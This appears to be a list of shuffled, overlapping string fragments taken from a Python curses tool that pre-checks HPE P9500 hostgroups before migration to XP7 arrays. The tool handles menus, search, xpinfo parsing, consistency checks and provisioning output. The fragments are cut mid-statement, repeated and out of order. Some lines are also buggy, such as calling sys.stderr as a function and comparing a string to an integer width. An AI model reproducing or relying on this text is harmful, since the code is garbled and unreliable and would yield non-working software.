"- 1: break else: # self.items = {\"select_str\":[(boxpair_name,hostgroup_name),...]} # self.selection.add(self.items[self.filtered_items[self.position]]) for add_item in",
"del self.selection[:] self.display() def get(self): return self.selection class Search(object): def __init__(self,window,title,stdscr): self.window =",
"NBRs:\") logger.info(instance_dict) logger.info(\"SITE NBRs:\") logger.info(site_dict) logger.info(\"COLLECT FILEs:\") logger.info(collectfile_dict) logger.info(\"XPINFO dir: {}\".format(xpinfo_dir)) ######################### ###",
"len(self.filtered_items) - 1: break else: # self.items = {\"select_str\":[(boxpair_name,hostgroup_name),...]} # self.selection.add(self.items[self.filtered_items[self.position]]) for add_item",
"return self.selection class Search(object): def __init__(self,window,title,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx() self.title",
"def __init__(self,window,selection,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx() self.selection = selection self.hostgroup_summary =",
"if hostgroup_name not in select_item_dict: select_item_dict[hostgroup_name] = set() select_item_dict[hostgroup_name].add((box_name,hostgroup_name)) hg_by_name_menu = Select_Menu(menu_win,select_item_dict,selection,search,stdscr) main_menu_items.append((\"Select",
"+ self.slice_len elif n > 0: if self.slice_end < len(self.display_list) - 1: self.slice_end",
"True: self.window.refresh() curses.doupdate() for index,item in enumerate(self.items): if index == self.position: mode =",
"= \"{} : {}\".format(self.title, \",\".join([\"{}-{}\".format(x[0],x[1]) for x in self.selection])) if len(line) >= self.width:",
"self.display() def clear(self): self.search_str = \"\" self.display() def get(self): return self.search_str class Consistent(object):",
"logger.info(\"BOXPAIR :\") logger.info(boxpair_dict) logger.info(\"SERIAL NBRs:\") logger.info(serialnbr_dict) logger.info(\"INSTANCE NBRs:\") logger.info(instance_dict) logger.info(\"SITE NBRs:\") logger.info(site_dict) logger.info(\"COLLECT",
"\"\"\" if self.search.get() != \"\": logger.debug(\"Select_Menu.update :: update items to match search str",
"= \"{}: {}\".format(index,item) line = \"{}\".format(item) if len(line) >= self.width: line = line[:self.width-1]",
"main_menu_items.append((\"Select by HOSTNAME\",hg_by_host_menu.display)) ### select hostgroups by name ### select_item_dict = {} for",
"1 logger.debug(\"Select_Menu.navigate :: position = {}, n = {}\".format(self.position,n )) ### adjust slice",
"len(hba_wwn.nickname.split(\"_\")) > 1: sel_item = hba_wwn.nickname.split(\"_\")[0] else: sel_item = hba_wwn.nickname if \"{}-{}\".format(box_name,sel_item) not",
"self.slice_end += n if self.slice_end > len(self.xpinfo_file_list) - 1: self.slice_end = len(self.xpinfo_file_list) -",
"cfg.get(\"dir\",\"log\") except: sys.stderr.write(\"log file dir not defined, exiting..\\n\") sys.exit(1) try: xpinfo_dir = cfg.get(\"dir\",\"xpinfo\")",
"self.reply = self.window.getstr() ### after we received the response ### self.update_object.set(self.reply) self.window.clear() self.panel.hide()",
"self.window = window self.heigth,self.width = self.window.getmaxyx() self.title = title self.search_str = \"\" def",
"self.navigate(-10) elif key == curses.KEY_NPAGE: self.navigate(10) self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() class ShowWriteProvisionMenu(object): def",
"self.display() def get(self): return self.search_str class Consistent(object): def __init__(self,window,title,stdscr): self.window = window self.heigth,self.width",
"### self.display_list = [] for box_name,hostgroup_name in self.selection.get(): self.display_list.extend(box_dict[box_name].get_hostgroup_noluns(hostgroup_name)) ### now we know",
"selection = Selection(select_win,\"SELECTED HOSTGROUP(s)\",stdscr) selection.display() ### define consistent_win ### consistent_win = stdscr.subwin(3,curses.COLS,curses.LINES-4,0) consistent",
"sys.stderr.write(\"collect file dir not defined, exiting..\\n\") sys.exit(1) try: map_dir = cfg.get(\"dir\",\"map\") except: sys.stderr.write(\"map",
"### read XPINFO file ### xpinfo_menu = Select_XPinfo(menu_win,selection,xpinfo_dir,stdscr) main_menu_items.append((\"Read XPINFO file\",xpinfo_menu.display)) ### show",
"+ self.slice_len self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.position = 0 self.selection =",
"box_name,hostgroup_name in self.consistent.get(): if box_dict[box_name].test_hostgroup_exists(hostgroup_name): sf = os.path.join(self.map_dir,\"{}_{}.prov\".format(box_name,hostgroup_name)) with open(sf,\"wt\") as sfh: box_dict[box_name].print_provisioning(hostgroup_name,sfh)",
"!= \"\": logger.debug(\"Select_Menu.update :: update items to match search str {}\".format(self.search.get())) self.filtered_items =",
"= Search(search_win,\"Display HOSTGROUPS matching this SEARCH expression\",stdscr) search.display() ### define selection_win ### select_win",
"file 2.0 Consistency check update 2.1 Add xpinfo file processing CONFIG : xpmig.ini",
"= hba_wwn.nickname if \"{}-{}\".format(box_name,sel_item) not in select_item_dict: select_item_dict[\"{}-{}\".format(box_name,sel_item)] = set() select_item_dict[\"{}-{}\".format(box_name,sel_item)].add((box_name,hostgroup_name)) hg_by_host_menu =",
"{}\".format(xpinfo_dir)) ######################### ### instantiate boxes ### ######################### for box_name in collectfile_dict: collect_file =",
"in [curses.KEY_ENTER,ord(\"\\n\")]: if self.position == len(self.filtered_items) - 1: break else: # self.items =",
"self.display() def clear(self): del self.consistent[:] self.display() def get(self): return self.consistent class ShowSummaryMenu(object): def",
"main_menu_items.append((\"Write PROVISION file\",write_prov.display)) main_menu = Menu(menu_win,main_menu_items,stdscr) main_menu.display() ### refresh & wait ### stdscr.refresh()",
"site = site_dict[box_name] else: err_msg = \"No site defined for box {}, exiting..\".format(box_name)",
"to match search all\") self.filtered_items = copy.copy(self.items.keys()) self.filtered_items.append(\"exit\") self.slice_start = 0 self.slice_end =",
"= \"No serial nbr defined for box {}, exiting..\".format(box_name) logger.error(err_msg) sys.stderr(err_msg + \"\\n\")",
"self.slice_len def display(self): self.panel.top() self.panel.show() self.window.clear() self.update() while True: self.window.clear() self.window.refresh() curses.doupdate() ###",
"to be valid, skipping {}\".format(row)) ### translate ldev to hostgroup ### for serial_nbr",
"[f for f in os.listdir(self.xpinfo_dir) if os.path.isfile(\"{}/{}\".format(self.xpinfo_dir,f)) and re.match(\".+\\.xpinfo$\",f,flags=re.IGNORECASE)] self.xpinfo_file_list.append(\"exit\") self.slice_len = min(len(self.xpinfo_file_list)-1,",
"VERSION : Based on previous ODR framework 1.0 Initial version 1.1 Curses menu",
"\"{}: {}\".format(self.title,\",\".join([\"{}-{}\".format(x[0],x[1]) for x in self.consistent])) if len(line) >= self.width: line = line[:self.width-1]",
"self.position < 0: self.position = 0 elif self.position >= len(self.xpinfo_file_list): self.position = len(self.xpinfo_file_list)",
"line = \"{}\".format(item[0]) if len(line) >= self.width: line = line[:self.width-1] self.window.addstr(1+index,2,line,mode) key =",
"not added to consistent hostgroup list during consistency check\".format(box_name,hostgroup_name)) else: logger.debug(\"{}-{} does not",
"# self.items = {\"select_str\":[(boxpair_name,hostgroup_name),...]} # self.selection.add(self.items[self.filtered_items[self.position]]) for add_item in self.items[self.filtered_items[self.position]]: self.selection.add(add_item) elif key",
">= self.width: line = line[:self.width-1] self.window.addstr(1,2,line) self.window.border() self.window.refresh() curses.doupdate() def set(self,search_str): self.search_str =",
"#################################################################################################### def main(stdscr): ### clear screen ### stdscr.clear() ### check window heigth and",
"import panel import re import logging import logging.handlers import copy from ConfigParser import",
"display(self): self.panel.top() self.panel.show() self.window.clear() self.update() while True: self.window.clear() self.window.refresh() curses.doupdate() ### show the",
"### if n < 0: if self.position - self.slice_start < 2 and self.slice_start",
"key == curses.KEY_DOWN: self.navigate(1) self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() class InputMenu(object): def __init__(self,window,text,upd_obj,stdscr): self.window",
"map_dir = cfg.get(\"dir\",\"map\") except: sys.stderr.write(\"map file dir not defined, exiting..\\n\") sys.exit(1) serial_to_name_dict =",
"self.items[self.position][1]() elif key == curses.KEY_UP: self.navigate(-1) elif key == curses.KEY_DOWN: self.navigate(1) self.window.clear() self.panel.hide()",
"[] for box_name,hostgroup_name in self.selection.get(): if box_dict[box_name].test_hostgroup_exists(hostgroup_name): ### TODO: add CA check ###",
"n if self.slice_end > len(self.filtered_items) - 1: self.slice_end = len(self.filtered_items) - 1 self.slice_start",
"add_item in self.items[self.filtered_items[self.position]]: self.selection.add(add_item) elif key == curses.KEY_UP: self.navigate(-1) elif key == curses.KEY_DOWN:",
"self.slice_start <= index <= self.slice_end: # logger.debug(\"SelectMenu.display :: index in slice {} -",
"= 0 self.slice_len = min(len(self.display_list),self.heigth-6) self.slice_end = self.slice_start + self.slice_len while True: self.window.clear()",
"break else: self.items[self.position][1]() elif key == curses.KEY_UP: self.navigate(-1) elif key == curses.KEY_DOWN: self.navigate(1)",
"re.match(\".+\\.xpinfo$\",f,flags=re.IGNORECASE)] self.xpinfo_file_list.append(\"exit\") self.slice_len = min(len(self.xpinfo_file_list)-1, self.heigth - 6) self.slice_start = 0 self.slice_end =",
"1: break else: logger.debug(\"XPINFO: start processing {}\".format(self.xpinfo_file_list[self.position])) serial_nbr_set = set(serialnbr_dict.values()) ldev_dict = {}",
"= panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.text = text self.reply = \"\" self.update_object = upd_obj",
"self.window.getch() if key in [curses.KEY_ENTER,ord(\"\\n\"),ord(\"Y\"),ord(\"y\")]: ### write out the ldevs to file ###",
"- self.position < 2 and self.slice_end < len(self.filtered_items) - 1: ### slide slice",
"exiting..\".format(box_name) logger.error(err_msg) sys.stderr(err_msg + \"\\n\") sys.exit(1) box_dict[box_name] = xp7.XP7(box_name,instance_nbr,serial_nbr,site,collect_file) logger.info(\"XP7 object created for",
"serialnbr_dict: serial_nbr = serialnbr_dict[box_name] else: err_msg = \"No serial nbr defined for box",
"self.position - self.slice_start < 2 and self.slice_start >= 1: ### slide slice up",
"if not cfg.has_section(mandatory_section): sys.stderr(\"{} section missing in config file {}, exiting..\".format(mandatory_section,configfile)) sys.exit(1) for",
"= 0 self.slice_end = self.slice_start + self.slice_len self.position = 0 def navigate(self,n): self.position",
"logger.info(box_dict[box_name]) ##################### ### start menu ### ##################### curses.wrapper(main) logger.info(\"#\" * linelen) logger.info(\"XPMIG PRECHECK",
"to addstr line {}\".format(line)) if self.slice_start <= index <= self.slice_end: # logger.debug(\"SelectMenu.display ::",
"main_menu_items = [] input_search = InputMenu(menu_win,\"Specify new search string\",search,stdscr) main_menu_items.append((\"Set SEARCH string\",input_search.display)) main_menu_items.append((\"Clear",
"examine hostgroup is ready for migration AUTHOR : <NAME> / StorageTeam VERSION :",
"hostgroup_dict[box_name] = set() for ldev_nbr in ldev_dict[serial_nbr]: for hostgroup_name in box_dict[box_name].get_ldev_hostgroups(ldev_nbr): hostgroup_dict[box_name].add(hostgroup_name) ###",
"< 2 and self.slice_end < len(self.xpinfo_file_list) - 1: ### slide slice down ###",
"self.selection class Search(object): def __init__(self,window,title,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx() self.title =",
"+= n if self.position < 0: self.position = 0 elif self.position >= len(self.xpinfo_file_list):",
"[curses.KEY_ENTER,ord(\"\\n\")]: if self.position == len(self.xpinfo_file_list) - 1: break else: logger.debug(\"XPINFO: start processing {}\".format(self.xpinfo_file_list[self.position]))",
"except: log_level = 30 try: log_size = cfg.getint(\"log\",\"maxsize\") except: log_size = 100000000 try:",
"boxpair_dict[name.upper()] = value.split(\",\") for name,value in cfg.items(\"serialnbr\"): serialnbr_dict[name.upper()] = int(value) for name,value in",
"\".format(self.text) if line >= self.width: line = line[:self.width-1] self.window.addstr(1,2,line) curses.echo() self.window.refresh() curses.doupdate() self.reply",
"defined, exiting..\\n\") sys.exit(1) try: map_dir = cfg.get(\"dir\",\"map\") except: sys.stderr.write(\"map file dir not defined,",
"import os.path import csv import string import xp7 #################################################################################################### ### VARIABLES #################################################################################################### linelen",
"list to display ### self.display_list = [] for box_name,hostgroup_name in self.selection.get(): self.display_list.extend(box_dict[box_name].get_hostgroup_noluns(hostgroup_name)) ###",
"= panel.new_panel(self.window) self.panel.hide() panel.update_panels() def display(self): self.panel.top() self.panel.show() self.window.clear() self.window.addstr(1,2,\"Write provisioning out to",
"select_item_dict = {} for box_name in boxpair_dict[boxpair_name]: hostgroup_name_list = box_dict[box_name].get_hostgroups() for hostgroup_name in",
"self.selection.add(add_item) elif key == curses.KEY_UP: self.navigate(-1) elif key == curses.KEY_DOWN: self.navigate(1) elif key",
"\"{}\".format(item) if len(line) >= self.width: line = line[:self.width-1] ### only add lines in",
"__init__(self,window,title,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx() self.title = title self.search_str = \"\"",
"line = line[:self.width-1] ### only add lines in the slice ### if self.slice_start",
"if box_name in instance_dict: instance_nbr = instance_dict[box_name] else: err_msg = \"No HORCM instance",
"HOSTGROUP(s)\",stdscr) selection.display() ### define consistent_win ### consistent_win = stdscr.subwin(3,curses.COLS,curses.LINES-4,0) consistent = Consistent(consistent_win,\"CONSISTENT HOSTGROUP(s)\",stdscr)",
"lines in the slice ### if self.slice_start <= index <= self.slice_end: self.window.addstr(1+(index-self.slice_start),2,line,mode) key",
"self.panel.hide() panel.update_panels() curses.doupdate() class ShowWriteProvisionMenu(object): def __init__(self,window,consistent,map_dir,stdscr): self.window = window self.consistent = consistent",
"search = Search(search_win,\"Display HOSTGROUPS matching this SEARCH expression\",stdscr) search.display() ### define selection_win ###",
"curses.A_STANDOUT else: mode = curses.A_NORMAL # line = \"{}: {}\".format(index,item) line = \"{}\".format(item)",
"files ### for index,item in enumerate(self.xpinfo_file_list): if index == self.position: mode = curses.A_STANDOUT",
"xpinfo_dir = cfg.get(\"dir\",\"xpinfo\") except: sys.stderr.write(\"xpinfo file dir not defined, exiting..\\n\") sys.exit(1) try: collect_dir",
"hostgroup_name in hostgroup_name_list: if hostgroup_name not in select_item_dict: select_item_dict[hostgroup_name] = set() select_item_dict[hostgroup_name].add((box_name,hostgroup_name)) hg_by_box_menu",
"current_set = set(self.consistent) current_set.add(item) self.consistent = list(sorted(current_set)) self.display() def clear(self): del self.consistent[:] self.display()",
"curses.A_STANDOUT else: mode = curses.A_NORMAL line = \"{}\".format(item) if len(line) >= self.width: line",
"for hba_wwn in hba_wwn_list: if len(hba_wwn.nickname.split(\"_\")) > 1: sel_item = hba_wwn.nickname.split(\"_\")[0] else: sel_item",
"set() ### process the selected xpinfo file ### with open(\"{}/{}\".format(self.xpinfo_dir,self.xpinfo_file_list[self.position]),\"rt\") as f: xpinfo_file_reader",
"self.window.getmaxyx() self.title = title self.selection = [] def display(self): self.window.clear() line = \"{}",
"%(levelname)s %(message)s\",\"%Y/%m/%d-%H:%M:%S\") fh.setFormatter(formatter) logger.addHandler(fh) logger.info(\"#\" * linelen) logger.info(\"XPMIG PRECHECK started\") logger.info(\"#\" * linelen)",
"### TODO: add CA check ### result,report = box_dict[box_name].get_hostgroup_consistency(hostgroup_name) self.display_list.extend(report) if result: self.consistent.add((box_name,hostgroup_name))",
"title_win.addstr(1,2,\"HPE P9500 TO XP7 MIGRATION PRE-CHECK\") title_win.border() ### define search_win ### search_win =",
"curses.KEY_NPAGE: self.navigate(10) self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() class ShowWriteProvisionMenu(object): def __init__(self,window,consistent,map_dir,stdscr): self.window = window",
"self.position: mode = curses.A_STANDOUT else: mode = curses.A_NORMAL # line = \"{}: {}\".format(index,item)",
"== curses.KEY_UP: self.navigate(-1) elif key == curses.KEY_DOWN: self.navigate(1) self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() class",
"self.slice_len elif n > 0: if self.slice_end - self.position < 2 and self.slice_end",
"> len(self.display_list) - 1: self.slice_end = len(self.display_list) - 1 self.slice_start = self.slice_end -",
"2.0 Consistency check update 2.1 Add xpinfo file processing CONFIG : xpmig.ini LOG",
"self.position = len(self.xpinfo_file_list) - 1 if n < 0: if self.position - self.slice_start",
"- 1: self.slice_end = len(self.filtered_items) - 1 self.slice_start = self.slice_end - self.slice_len logger.debug(\"Select_Menu.navigate",
"index in slice {} - {}, executing addstr\".format(self.slice_start,self.slice_end)) self.window.addstr(1+(index-self.slice_start),2,line,mode) key = self.window.getch() if",
"<ARROW-DOWN or PAGE-DOWN> SCROLL DOWN <B> BACK\",curses.A_BOLD) ### define menu_win ### menu_win =",
":: slide slice down to {}-{}\".format(self.slice_start,self.slice_end )) def display(self): self.panel.top() self.panel.show() self.window.clear() self.update()",
"Select_XPinfo(menu_win,selection,xpinfo_dir,stdscr) main_menu_items.append((\"Read XPINFO file\",xpinfo_menu.display)) ### show hostgroup summary menu ### hostgroup_summary = ShowSummaryMenu(menu_win,selection,stdscr)",
"self.slice_start < 2 and self.slice_start >= 1: ### slide slice up ### self.slice_start",
"in sorted(boxpair_dict.keys()): select_item_dict = {} for box_name in boxpair_dict[boxpair_name]: hostgroup_name_list = box_dict[box_name].get_hostgroups() for",
"if self.slice_start <= index <= self.slice_end: # logger.debug(\"SelectMenu.display :: index in slice {}",
"= items self.items.append((\"exit\",\"exit\")) def navigate(self,n): self.position += n if self.position < 0: self.position",
"class Menu(object): def __init__(self,window,items,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx() self.window.keypad(1) self.panel =",
"ldev_dict[serial_nbr]: for hostgroup_name in box_dict[box_name].get_ldev_hostgroups(ldev_nbr): hostgroup_dict[box_name].add(hostgroup_name) ### add found hostgroups to the selection",
"in [ord(\"b\"),ord(\"B\")]: break elif key in [curses.KEY_ENTER,ord(\"\\n\")]: if self.position == len(self.xpinfo_file_list) - 1:",
"os.path.join(log_dir,\"xpmig_precheck.log\") logger = logging.getLogger(\"xpmig_precheck\") logger.setLevel(log_level) fh = logging.handlers.RotatingFileHandler(logfile,maxBytes=log_size,backupCount=log_versions) formatter = logging.Formatter(\"%(asctime)s %(levelname)s %(message)s\",\"%Y/%m/%d-%H:%M:%S\")",
"[] def display(self): self.window.clear() line = \"{} : {}\".format(self.title, \",\".join([\"{}-{}\".format(x[0],x[1]) for x in",
"read XPINFO file ### xpinfo_menu = Select_XPinfo(menu_win,selection,xpinfo_dir,stdscr) main_menu_items.append((\"Read XPINFO file\",xpinfo_menu.display)) ### show hostgroup",
"add(self,item): current_set = set(self.selection) current_set.add(item) self.selection = list(sorted(current_set)) self.display() def clear(self): del self.selection[:]",
"except: sys.stderr.write(\"collect file dir not defined, exiting..\\n\") sys.exit(1) try: map_dir = cfg.get(\"dir\",\"map\") except:",
"self.position == len(self.items) - 1: break else: self.items[self.position][1]() elif key == curses.KEY_UP: self.navigate(-1)",
"self.search_str = \"\" self.display() def get(self): return self.search_str class Consistent(object): def __init__(self,window,title,stdscr): self.window",
">= len(self.items): self.position = len(self.items) - 1 def display(self): self.panel.top() self.panel.show() self.window.clear() while",
"get(self): return self.consistent class ShowSummaryMenu(object): def __init__(self,window,selection,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx()",
"match search str {}\".format(self.search.get())) self.filtered_items = [x for x in self.items.keys() if re.search(self.search.get(),x,flags=re.IGNORECASE)]",
"for box_name,hostgroup_name in self.consistent.get(): if box_dict[box_name].test_hostgroup_exists(hostgroup_name): sf = os.path.join(self.map_dir,\"{}_{}.prov\".format(box_name,hostgroup_name)) with open(sf,\"wt\") as sfh:",
"if self.slice_start < 0: self.slice_start = 0 self.slice_end = self.slice_start + self.slice_len elif",
"boxpair_name in sorted(boxpair_dict.keys()): select_item_dict = {} for box_name in boxpair_dict[boxpair_name]: hostgroup_name_list = box_dict[box_name].get_hostgroups()",
"self.navigate(10) self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() class ShowWriteProvisionMenu(object): def __init__(self,window,consistent,map_dir,stdscr): self.window = window self.consistent",
"try: log_dir = cfg.get(\"dir\",\"log\") except: sys.stderr.write(\"log file dir not defined, exiting..\\n\") sys.exit(1) try:",
"now we know what to display ### self.slice_start = 0 self.slice_len = min(len(self.display_list),self.heigth-6)",
"[] def display(self): self.window.clear() line = \"{}: {}\".format(self.title,\",\".join([\"{}-{}\".format(x[0],x[1]) for x in self.consistent])) if",
"curses.KEY_NPAGE: self.navigate(10) self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() #################################################################################################### ### MAIN #################################################################################################### def main(stdscr): ###",
"out the ldevs to file ### for box_name,hostgroup_name in self.consistent.get(): if box_dict[box_name].test_hostgroup_exists(hostgroup_name): sf",
")) elif n > 0: if self.slice_end - self.position < 2 and self.slice_end",
"display(self): self.window.clear() line = \"{}: {}\".format(self.title,\",\".join([\"{}-{}\".format(x[0],x[1]) for x in self.consistent])) if len(line) >=",
"self.panel.show() self.window.clear() while True: self.window.refresh() curses.doupdate() for index,item in enumerate(self.items): if index ==",
"in select_item_dict: select_item_dict[\"{}-{}\".format(box_name,sel_item)] = set() select_item_dict[\"{}-{}\".format(box_name,sel_item)].add((box_name,hostgroup_name)) hg_by_host_menu = Select_Menu(menu_win,select_item_dict,selection,search,stdscr) main_menu_items.append((\"Select by HOSTNAME\",hg_by_host_menu.display)) ###",
"### parse config ### #################### configfile = \"xpmig.ini\" cfg = ConfigParser() cfg.read(configfile) for",
"key_win = stdscr.subwin(1,curses.COLS,curses.LINES-1,0) #key_win.clear() #key_win.refresh() #curses.doupdate() key_win.addstr(0,2,\"<ARROW-UP or PAGE-UP> SCROLL UP <ARROW-DOWN or",
"main_menu_items.append((\"Select by HOSTGROUP\",hg_by_name_menu.display)) ### read XPINFO file ### xpinfo_menu = Select_XPinfo(menu_win,selection,xpinfo_dir,stdscr) main_menu_items.append((\"Read XPINFO",
"self.window = window self.heigth,self.width = self.window.getmaxyx() self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.position",
"added 1.2 Add search term criteria 1.3 Add config file 2.0 Consistency check",
"logger.error(err_msg) sys.stderr(err_msg + \"\\n\") sys.exit(1) if box_name in serialnbr_dict: serial_nbr = serialnbr_dict[box_name] else:",
"in self.selection.get(): if box_dict[box_name].test_hostgroup_exists(hostgroup_name): ### TODO: add CA check ### result,report = box_dict[box_name].get_hostgroup_consistency(hostgroup_name)",
"0 self.slice_end = self.slice_start + self.slice_len elif n > 0: if self.slice_end -",
"curses.doupdate() for index,item in enumerate(self.display_list): if len(item) >= self.width: item = item[:self.width-1] if",
"0: if self.slice_end - self.position < 2 and self.slice_end < len(self.filtered_items) - 1:",
"self.slice_start = 0 self.slice_len = min(len(self.filtered_items)-1,self.heigth-6) self.slice_end = self.slice_start + self.slice_len self.window.keypad(1) self.panel",
"= self.window.getmaxyx() ### items is a dict ### self.items = items self.filtered_items =",
"line = \"{}: \".format(self.text) if line >= self.width: line = line[:self.width-1] self.window.addstr(1,2,line) curses.echo()",
"panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.position = 0 self.items = items self.items.append((\"exit\",\"exit\")) def navigate(self,n): self.position",
"if n < 0: if self.slice_start >= 1: self.slice_start += n if self.slice_start",
"hostgroup_name in hostgroup_name_list: hba_wwn_list = box_dict[box_name].get_hostgroup_hba_wwns(hostgroup_name) for hba_wwn in hba_wwn_list: if len(hba_wwn.nickname.split(\"_\")) >",
"slice ### if self.slice_start <= index <= self.slice_end: self.window.addstr(1+(index-self.slice_start),2,line,mode) key = self.window.getch() if",
"for hostgroup_name in hostgroup_name_list: hba_wwn_list = box_dict[box_name].get_hostgroup_hba_wwns(hostgroup_name) for hba_wwn in hba_wwn_list: if len(hba_wwn.nickname.split(\"_\"))",
"key = self.window.getch() if key in [curses.KEY_ENTER,ord(\"\\n\"),ord(\"Y\"),ord(\"y\")]: ### write out the ldevs to",
"in [curses.KEY_ENTER,ord(\"\\n\"),ord(\"B\"),ord(\"b\")]: if self.position == len(self.items) - 1: break else: self.items[self.position][1]() elif key",
"object created for box {} :\".format(box_name)) logger.info(box_dict[box_name]) ##################### ### start menu ### #####################",
"serial_nbr in serial_nbr_set: ldev_dict[serial_nbr] = set() ### process the selected xpinfo file ###",
"exiting..\".format(box_name) logger.error(err_msg) sys.stderr(err_msg + \"\\n\") sys.exit(1) if box_name in serialnbr_dict: serial_nbr = serialnbr_dict[box_name]",
"curses.doupdate() self.reply = self.window.getstr() ### after we received the response ### self.update_object.set(self.reply) self.window.clear()",
"StorageTeam VERSION : Based on previous ODR framework 1.0 Initial version 1.1 Curses",
"ShowConsistencyMenu(menu_win,selection,consistent,stdscr) main_menu_items.append((\"Show HOSTGROUPs consistency check results\",hostgroup_consistency.display)) main_menu_items.append((\"Clear HOSTGROUP selection\",selection.clear)) main_menu_items.append((\"Clear consistent HOSTGROUP\",consistent.clear)) write_prov",
"down ### self.slice_end += n if self.slice_end > len(self.xpinfo_file_list) - 1: self.slice_end =",
"in instance_dict: instance_nbr = instance_dict[box_name] else: err_msg = \"No HORCM instance nbr defined",
"box_dict[box_name].test_hostgroup_exists(hostgroup_name): sf = os.path.join(self.map_dir,\"{}_{}.prov\".format(box_name,hostgroup_name)) with open(sf,\"wt\") as sfh: box_dict[box_name].print_provisioning(hostgroup_name,sfh) self.window.addstr(2,2,\"Written..\") else: self.window.addstr(2,2,\"Cancelled..\") self.window.clear()",
"### items is a dict ### self.items = items self.filtered_items = copy.copy(self.items.keys()) self.filtered_items.append(\"exit\")",
"n if self.slice_start < 0: self.slice_start = 0 self.slice_end = self.slice_start + self.slice_len",
"set() select_item_dict[\"{}-{}\".format(box_name,sel_item)].add((box_name,hostgroup_name)) hg_by_host_menu = Select_Menu(menu_win,select_item_dict,selection,search,stdscr) main_menu_items.append((\"Select by HOSTNAME\",hg_by_host_menu.display)) ### select hostgroups by name",
"linelen = 100 boxpair_dict = {} serialnbr_dict = {} instance_dict = {} site_dict",
"break else: # self.items = {\"select_str\":[(boxpair_name,hostgroup_name),...]} # self.selection.add(self.items[self.filtered_items[self.position]]) for add_item in self.items[self.filtered_items[self.position]]: self.selection.add(add_item)",
":: update items to match search all\") self.filtered_items = copy.copy(self.items.keys()) self.filtered_items.append(\"exit\") self.slice_start =",
"self.navigate(10) self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() class ShowConsistencyMenu(object): def __init__(self,window,selection,consistent,stdscr): self.window = window self.selection",
"S/N, added to ldev_dict, now at {} elements\".format(len(ldev_dict[serial_nbr]))) else: logger.error(\"XPINFO: line too short",
"and self.slice_end < len(self.filtered_items) - 1: ### slide slice down ### self.slice_end +=",
"window self.selection = selection self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.display_list = []",
"line = \"{}: {}\".format(index,item[0]) line = \"{}\".format(item[0]) if len(line) >= self.width: line =",
"xpinfo file\".format(serial_nbr,ldev_nbr)) if serial_nbr in ldev_dict: ldev_dict[serial_nbr].add(ldev_nbr) logger.debug(\"XPINFO: known S/N, added to ldev_dict,",
"len(self.display_list) - 1 self.slice_start = self.slice_end - self.slice_len def display(self): self.panel.top() self.panel.show() self.window.clear()",
"Curses menu structure added 1.2 Add search term criteria 1.3 Add config file",
"self.slice_start = 0 self.slice_end = self.slice_start + self.slice_len self.position = 0 def navigate(self,n):",
"to the selection\".format(box_name,hostgroup_name)) self.selection.add((box_name,hostgroup_name)) elif key == curses.KEY_UP: self.navigate(-1) elif key == curses.KEY_DOWN:",
"= cfg.get(\"dir\",\"log\") except: sys.stderr.write(\"log file dir not defined, exiting..\\n\") sys.exit(1) try: xpinfo_dir =",
"30 try: log_size = cfg.getint(\"log\",\"maxsize\") except: log_size = 100000000 try: log_versions = cfg.getint(\"log\",\"maxversions\")",
"sorted(boxpair_dict.keys()): select_item_dict = {} for box_name in boxpair_dict[boxpair_name]: hostgroup_name_list = box_dict[box_name].get_hostgroups() for hostgroup_name",
"= row[0] device_name = row[1] ldev_nbr = xp7.standard_format_ldev(row[5]) serial_nbr = int(row[8]) logger.debug(\"XPINFO: got",
"for box_name in boxpair_dict[boxpair_name]: hostgroup_name_list = box_dict[box_name].get_hostgroups() for hostgroup_name in hostgroup_name_list: hba_wwn_list =",
"# line = \"{}: {}\".format(index,item[0]) line = \"{}\".format(item[0]) if len(line) >= self.width: line",
"if len(hba_wwn.nickname.split(\"_\")) > 1: sel_item = hba_wwn.nickname.split(\"_\")[0] else: sel_item = hba_wwn.nickname if \"{}-{}\".format(box_name,sel_item)",
"curses.doupdate() ### show the list of xpinfo files ### for index,item in enumerate(self.xpinfo_file_list):",
"position = {}, n = {}\".format(self.position,n )) ### adjust slice ### if n",
"<NAME> / StorageTeam VERSION : Based on previous ODR framework 1.0 Initial version",
"# line = \"{}: {}\".format(index,item) line = \"{}\".format(item) if len(line) >= self.width: line",
"box_dict[box_name].get_hostgroup_consistency(hostgroup_name) self.display_list.extend(report) if result: self.consistent.add((box_name,hostgroup_name)) logger.info(\"{}-{} added to consistent hostgroup list during consistency",
"os.path.join(self.map_dir,\"{}_{}.prov\".format(box_name,hostgroup_name)) with open(sf,\"wt\") as sfh: box_dict[box_name].print_provisioning(hostgroup_name,sfh) self.window.addstr(2,2,\"Written..\") else: self.window.addstr(2,2,\"Cancelled..\") self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate()",
"if os.path.exists(self.xpinfo_dir): del(self.xpinfo_file_list[:]) self.xpinfo_file_list = [f for f in os.listdir(self.xpinfo_dir) if os.path.isfile(\"{}/{}\".format(self.xpinfo_dir,f)) and",
"fh = logging.handlers.RotatingFileHandler(logfile,maxBytes=log_size,backupCount=log_versions) formatter = logging.Formatter(\"%(asctime)s %(levelname)s %(message)s\",\"%Y/%m/%d-%H:%M:%S\") fh.setFormatter(formatter) logger.addHandler(fh) logger.info(\"#\" * linelen)",
"len(self.xpinfo_file_list): self.position = len(self.xpinfo_file_list) - 1 if n < 0: if self.position -",
"logging.Formatter(\"%(asctime)s %(levelname)s %(message)s\",\"%Y/%m/%d-%H:%M:%S\") fh.setFormatter(formatter) logger.addHandler(fh) logger.info(\"#\" * linelen) logger.info(\"XPMIG PRECHECK started\") logger.info(\"#\" *",
